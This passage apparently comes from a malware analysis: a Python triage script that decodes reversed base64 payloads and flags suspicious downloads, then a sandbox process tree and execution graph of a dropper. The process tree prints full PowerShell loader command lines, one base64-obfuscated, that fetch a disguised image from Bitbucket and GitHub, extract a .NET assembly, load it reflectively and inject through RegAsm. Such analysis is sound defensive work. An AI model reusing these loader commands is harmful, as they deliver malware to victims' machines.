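    signature, otherwise 'unknown'."""
    if data[:2] != b"MZ":
        return "unknown"
    if len(data) >= 0x40:
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
    return "mz"


def decode_blob(text: str) -> tuple:
    """Return (orientation, decoded bytes). The orientation the padding hints
    at is tried first; a PE result wins, else the first decodable one."""
    s = _strip(text)
    order = ("reversed", "forward") if s.startswith("=") else ("forward", "reversed")
    fallback = None
    for orientation in order:
        candidate = s[::-1] if orientation == "reversed" else s
        try:
            data = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue
        if classify_bytes(data) == "pe":
            return orientation, data
        if fallback is None:
            fallback = (orientation, data)
    if fallback is None:
        raise ValueError("not base64 in either orientation")
    return fallback


def suspicious_fetch(rec: dict) -> list:
    """Reasons a download record deserves a look; keys are this example's own."""
    reasons = []
    exe = rec.get("process", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe in {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}:
        reasons.append(f"request made by script host {exe}")
    if rec.get("host") == "bitbucket.org" and "/downloads/" in rec.get("path", ""):
        reasons.append("Bitbucket downloads attachment used for payload hosting")
    if rec.get("final_host", "").endswith(".s3.amazonaws.com") and "AWSAccessKeyId=" in rec.get("final_path", ""):
        reasons.append("302 to presigned S3 URL: short-lived, pin the bitbucket path and object hash instead")
    if rec.get("content_type", "").startswith("text/plain") and rec.get("content_length", 0) > 100_000:
        reasons.append("large text/plain body fetched by a script host: probably an encoded binary")
    return reasons


def triage(text: str, rec: dict) -> dict:
    orientation, data = decode_blob(text)
    return {"orientation": orientation, "kind": classify_bytes(data),
            "decoded_size": len(data), "reasons": suspicious_fetch(rec)}


# ---- constructed sample input (NOT the real po06.txt) ----------------------
def build_fake_pe() -> bytes:
    """128-byte stand-in: DOS header whose e_lfanew points at 'PE\\0\\0'."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3A)   # 0x3C bytes of DOS header
    hdr += (0x40).to_bytes(4, "little")       # e_lfanew = 0x40
    hdr += b"PE\x00\x00" + b"\x00" * 60       # NT signature + filler
    return bytes(hdr)


SAMPLE_BLOB = base64.b64encode(build_fake_pe()).decode()[::-1]  # reversed, so it starts with '='
SAMPLE_FETCH = {  # modelled on sessions 1 and 2 above; values abbreviated
    "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "host": "bitbucket.org",
    "path": "/rulmerurk/ertertqw/downloads/po06.txt",
    "final_host": "bbuseruploads.s3.amazonaws.com",
    "final_path": "/.../po06.txt?response-content-disposition=attachment&AWSAccessKeyId=ASIA...&Signature=...",
    "content_type": "text/plain",
    "content_length": 626996,
}

if __name__ == "__main__":
    print(triage(SAMPLE_BLOB, SAMPLE_FETCH))
```

Point the real body at triage() only after saving it; decoding tells you what to hand to a PE triage tool next, and the reasons list is what you would carry into a detection rule (script host + Bitbucket downloads path + oversized text/plain), not the presigned S3 URL.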


                                                        Target ID:0
                                                        Start time:03:33:11
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\Desktop\OTO2wVGgkl.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\OTO2wVGgkl.exe"
                                                        Imagebase:0x7ff6975a0000
                                                        File size:164'352 bytes
                                                        MD5 hash:63AF3844E6D0A5FA89DA17713CE1FB59
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:33:11
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c 123.vbs
                                                        Imagebase:0x7ff7f0930000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
                                                        Imagebase:0x7ff6e7ad0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g
#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN
#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#Ng#w#G8#c##v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:03:33:14
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:03:33:23
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x720000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:03:33:23
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                          Execution Graph

                                                          Execution Coverage:31.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:41.6%
                                                          Total number of Nodes:928
                                                          Total number of Limit Nodes:44
                                                          execution_graph 2984 7ff6975a33a0 2985 7ff6975a33bb CallWindowProcA 2984->2985 2986 7ff6975a33ac 2984->2986 2987 7ff6975a33b7 2985->2987 2986->2985 2986->2987 2988 7ff6975a55e0 2989 7ff6975a5641 ReadFile 2988->2989 2990 7ff6975a560d 2988->2990 2989->2990 2991 7ff6975a57e0 2992 7ff6975a581e 2991->2992 2993 7ff6975a57fc 2991->2993 2992->2993 2994 7ff6975a583d SetFilePointer 2992->2994 2994->2993 3012 7ff6975a8417 3013 7ff6975a842f 3012->3013 3014 7ff6975a8426 _exit 3012->3014 3015 7ff6975a8444 3013->3015 3016 7ff6975a8438 _cexit 3013->3016 3014->3013 3016->3015 3017 7ff6975a81b0 __getmainargs 3018 7ff6975a8b30 _XcptFilter 2901 7ff6975a58b0 2902 7ff6975a5904 2901->2902 2903 7ff6975a58ee 2901->2903 2904 7ff6975a58fc 2902->2904 2907 7ff6975a5a29 2902->2907 2910 7ff6975a591a 2902->2910 2903->2904 2905 7ff6975a5770 CloseHandle 2903->2905 2906 7ff6975a8470 7 API calls 2904->2906 2905->2904 2908 7ff6975a5af4 2906->2908 2909 7ff6975a5a35 SetWindowTextA 2907->2909 2911 7ff6975a5a4a 2907->2911 2909->2911 2910->2904 2912 7ff6975a5982 DosDateTimeToFileTime 2910->2912 2911->2904 2926 7ff6975a51bc GetFileAttributesA 2911->2926 2912->2904 2914 7ff6975a59a3 LocalFileTimeToFileTime 2912->2914 2914->2904 2916 7ff6975a59c1 SetFileTime 2914->2916 2916->2904 2917 7ff6975a59e9 2916->2917 2919 7ff6975a5770 CloseHandle 2917->2919 2918 7ff6975a5380 29 API calls 2920 7ff6975a5ab5 2918->2920 2921 7ff6975a59f2 SetFileAttributesA 2919->2921 2920->2904 2922 7ff6975a5ac1 2920->2922 2921->2904 2933 7ff6975a527c LocalAlloc 2922->2933 2925 7ff6975a5acb 2925->2904 2927 7ff6975a525f 2926->2927 2929 7ff6975a51de 2926->2929 2927->2904 2927->2918 2928 7ff6975a5246 SetFileAttributesA 2928->2927 2929->2927 2929->2928 2930 7ff6975a7ac8 28 API calls 2929->2930 2931 7ff6975a5228 2930->2931 2931->2927 2931->2928 2932 7ff6975a523c 2931->2932 2932->2928 2934 7ff6975a52d4 LocalAlloc 2933->2934 2935 7ff6975a52aa 2933->2935 2938 7ff6975a5300 2934->2938 2939 
7ff6975a52cd 2934->2939 2936 7ff6975a4dcc 24 API calls 2935->2936 2936->2939 2940 7ff6975a4dcc 24 API calls 2938->2940 2939->2925 2939->2939 2941 7ff6975a5323 LocalFree 2940->2941 2941->2939 3024 7ff6975a78b0 3025 7ff6975a78fd 3024->3025 3026 7ff6975a7ba8 CharPrevA 3025->3026 3027 7ff6975a7935 CreateFileA 3026->3027 3028 7ff6975a797e WriteFile 3027->3028 3029 7ff6975a7970 3027->3029 3030 7ff6975a79a2 CloseHandle 3028->3030 3032 7ff6975a8470 7 API calls 3029->3032 3030->3029 3033 7ff6975a79d5 3032->3033 3034 7ff6975a4a30 3035 7ff6975a4a50 3034->3035 3036 7ff6975a4a39 SendMessageA 3034->3036 3036->3035 3037 7ff6975a3530 3038 7ff6975a3802 EndDialog 3037->3038 3039 7ff6975a3557 3037->3039 3057 7ff6975a356b 3038->3057 3040 7ff6975a377e GetDesktopWindow 3039->3040 3041 7ff6975a3567 3039->3041 3042 7ff6975a4c68 14 API calls 3040->3042 3044 7ff6975a3635 GetDlgItemTextA 3041->3044 3045 7ff6975a357b 3041->3045 3041->3057 3043 7ff6975a3795 SetWindowTextA SendDlgItemMessageA 3042->3043 3046 7ff6975a37d8 GetDlgItem EnableWindow 3043->3046 3043->3057 3054 7ff6975a365e 3044->3054 3069 7ff6975a36e9 3044->3069 3047 7ff6975a3584 3045->3047 3048 7ff6975a3618 EndDialog 3045->3048 3046->3057 3049 7ff6975a3591 LoadStringA 3047->3049 3047->3057 3048->3057 3050 7ff6975a35de 3049->3050 3051 7ff6975a35bd 3049->3051 3074 7ff6975a4a60 LoadLibraryA 3050->3074 3055 7ff6975a4dcc 24 API calls 3051->3055 3053 7ff6975a4dcc 24 API calls 3053->3057 3058 7ff6975a3694 GetFileAttributesA 3054->3058 3054->3069 3073 7ff6975a35d7 3055->3073 3059 7ff6975a36a8 3058->3059 3060 7ff6975a36fa 3058->3060 3062 7ff6975a4dcc 24 API calls 3059->3062 3064 7ff6975a7ba8 CharPrevA 3060->3064 3061 7ff6975a35eb SetDlgItemTextA 3061->3051 3061->3057 3065 7ff6975a36cb 3062->3065 3063 7ff6975a374b EndDialog 3063->3057 3066 7ff6975a370e 3064->3066 3065->3057 3067 7ff6975a36d4 CreateDirectoryA 3065->3067 3068 7ff6975a6b70 31 API calls 3066->3068 3067->3060 3067->3069 3070 7ff6975a3716 3068->3070 3069->3053 3070->3069 3071 
7ff6975a3721 3070->3071 3072 7ff6975a6ca4 38 API calls 3071->3072 3071->3073 3072->3073 3073->3057 3073->3063 3075 7ff6975a4c20 3074->3075 3076 7ff6975a4aa0 GetProcAddress 3074->3076 3080 7ff6975a4dcc 24 API calls 3075->3080 3077 7ff6975a4ac2 GetProcAddress 3076->3077 3078 7ff6975a4c0a FreeLibrary 3076->3078 3077->3078 3079 7ff6975a4ae2 GetProcAddress 3077->3079 3078->3075 3079->3078 3082 7ff6975a4b04 3079->3082 3081 7ff6975a35e3 3080->3081 3081->3057 3081->3061 3083 7ff6975a4b13 GetTempPathA 3082->3083 3088 7ff6975a4b65 3082->3088 3084 7ff6975a4b2b 3083->3084 3084->3084 3085 7ff6975a4b34 CharPrevA 3084->3085 3087 7ff6975a4b4e CharPrevA 3085->3087 3085->3088 3086 7ff6975a4bee FreeLibrary 3086->3081 3087->3088 3088->3086 3089 7ff6975a5870 GlobalAlloc 3090 7ff6975a33f0 3091 7ff6975a3402 3090->3091 3092 7ff6975a34ec 3090->3092 3096 7ff6975a3441 GetDesktopWindow 3091->3096 3098 7ff6975a340f 3091->3098 3093 7ff6975a34e5 3092->3093 3094 7ff6975a34f5 SendDlgItemMessageA 3092->3094 3094->3093 3095 7ff6975a3430 EndDialog 3095->3093 3097 7ff6975a4c68 14 API calls 3096->3097 3099 7ff6975a3458 6 API calls 3097->3099 3098->3093 3098->3095 3099->3093 2066 7ff6975a8200 2085 7ff6975a8964 2066->2085 2070 7ff6975a824b 2071 7ff6975a825d 2070->2071 2073 7ff6975a8277 Sleep 2070->2073 2072 7ff6975a826d _amsg_exit 2071->2072 2078 7ff6975a8284 2071->2078 2072->2078 2073->2070 2074 7ff6975a82fc _initterm 2077 7ff6975a8319 _IsNonwritableInCurrentImage 2074->2077 2075 7ff6975a82dd 2076 7ff6975a83f8 _ismbblead 2076->2077 2077->2075 2077->2076 2079 7ff6975a837d 2077->2079 2078->2074 2078->2075 2078->2077 2089 7ff6975a2c54 GetVersion 2079->2089 2082 7ff6975a83cf 2082->2075 2084 7ff6975a83d8 _cexit 2082->2084 2083 7ff6975a83c7 exit 2083->2082 2084->2075 2086 7ff6975a8990 6 API calls 2085->2086 2087 7ff6975a8209 GetStartupInfoW 2085->2087 2088 7ff6975a8a0f 2086->2088 2087->2070 2088->2087 2090 7ff6975a2cc3 2089->2090 2091 7ff6975a2c7b 2089->2091 2113 7ff6975a2db4 2090->2113 2091->2090 2092 
7ff6975a2c7f GetModuleHandleW 2091->2092 2092->2090 2094 7ff6975a2c97 GetProcAddress 2092->2094 2094->2090 2095 7ff6975a2cb2 2094->2095 2095->2090 2096 7ff6975a2d7f 2099 7ff6975a2d97 2096->2099 2100 7ff6975a2d8b CloseHandle 2096->2100 2099->2082 2099->2083 2100->2099 2104 7ff6975a2d29 2104->2096 2105 7ff6975a2d5e 2104->2105 2106 7ff6975a2d33 2104->2106 2109 7ff6975a2d67 ExitWindowsEx 2105->2109 2110 7ff6975a2d7a 2105->2110 2230 7ff6975a4dcc 2106->2230 2109->2096 2259 7ff6975a1c0c GetCurrentProcess OpenProcessToken 2110->2259 2114 7ff6975a8b09 2113->2114 2115 7ff6975a2df9 memset memset 2114->2115 2267 7ff6975a5050 FindResourceA SizeofResource 2115->2267 2118 7ff6975a2e53 CreateEventA SetEvent 2119 7ff6975a5050 7 API calls 2118->2119 2122 7ff6975a2e92 2119->2122 2120 7ff6975a4dcc 24 API calls 2149 7ff6975a2fd9 2120->2149 2121 7ff6975a2ed5 2126 7ff6975a5050 7 API calls 2121->2126 2122->2121 2125 7ff6975a2fa3 2122->2125 2131 7ff6975a2e96 2122->2131 2123 7ff6975a4dcc 24 API calls 2158 7ff6975a2eb4 2123->2158 2272 7ff6975a70a8 2125->2272 2127 7ff6975a2eec 2126->2127 2130 7ff6975a2efe CreateMutexA 2127->2130 2127->2131 2130->2125 2133 7ff6975a2f22 GetLastError 2130->2133 2131->2123 2133->2125 2138 7ff6975a2f35 2133->2138 2134 7ff6975a2fb5 2134->2120 2135 7ff6975a2fc4 2136 7ff6975a2fde FindResourceExA 2135->2136 2137 7ff6975a2fcd 2135->2137 2140 7ff6975a2fff LoadResource 2136->2140 2141 7ff6975a3014 2136->2141 2307 7ff6975a204c 2137->2307 2142 7ff6975a2f62 2138->2142 2143 7ff6975a2f4a 2138->2143 2140->2141 2145 7ff6975a3029 2141->2145 2146 7ff6975a301d #17 2141->2146 2147 7ff6975a4dcc 24 API calls 2142->2147 2144 7ff6975a4dcc 24 API calls 2143->2144 2148 7ff6975a2f60 2144->2148 2145->2149 2150 7ff6975a303a 2145->2150 2146->2145 2151 7ff6975a2f7c 2147->2151 2152 7ff6975a2f81 CloseHandle 2148->2152 2299 7ff6975a8470 2149->2299 2322 7ff6975a3bf4 GetVersionExA 2150->2322 2151->2125 2151->2152 2152->2149 2158->2149 2159 7ff6975a30ec 2160 7ff6975a3141 2159->2160 2161 
7ff6975a3116 2159->2161 2456 7ff6975a5fe4 2160->2456 2163 7ff6975a3134 2161->2163 2436 7ff6975a60a4 2161->2436 2614 7ff6975a3f74 2163->2614 2171 7ff6975a8470 7 API calls 2173 7ff6975a2ce1 2171->2173 2172 7ff6975a315b GetSystemDirectoryA 2174 7ff6975a7ba8 CharPrevA 2172->2174 2205 7ff6975a61ec 2173->2205 2175 7ff6975a3186 LoadLibraryA 2174->2175 2176 7ff6975a319f GetProcAddress 2175->2176 2177 7ff6975a31c9 FreeLibrary 2175->2177 2176->2177 2178 7ff6975a31ba DecryptFileA 2176->2178 2179 7ff6975a3273 SetCurrentDirectoryA 2177->2179 2180 7ff6975a31e4 2177->2180 2178->2177 2181 7ff6975a320d 2179->2181 2189 7ff6975a3291 2179->2189 2180->2179 2182 7ff6975a31f0 GetWindowsDirectoryA 2180->2182 2186 7ff6975a4dcc 24 API calls 2181->2186 2182->2181 2184 7ff6975a325a 2182->2184 2183 7ff6975a331f 2190 7ff6975a2318 18 API calls 2183->2190 2197 7ff6975a3347 2183->2197 2203 7ff6975a3236 2183->2203 2519 7ff6975a6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2184->2519 2187 7ff6975a322b 2186->2187 2633 7ff6975a7700 GetLastError 2187->2633 2189->2183 2191 7ff6975a32fb 2189->2191 2194 7ff6975a32cb 2189->2194 2190->2197 2546 7ff6975a5d90 2191->2546 2193 7ff6975a3368 2201 7ff6975a3383 2193->2201 2193->2203 2198 7ff6975a7ac8 28 API calls 2194->2198 2195 7ff6975a3230 2195->2203 2197->2193 2568 7ff6975a40c4 2197->2568 2199 7ff6975a32f6 2198->2199 2199->2203 2634 7ff6975a772c 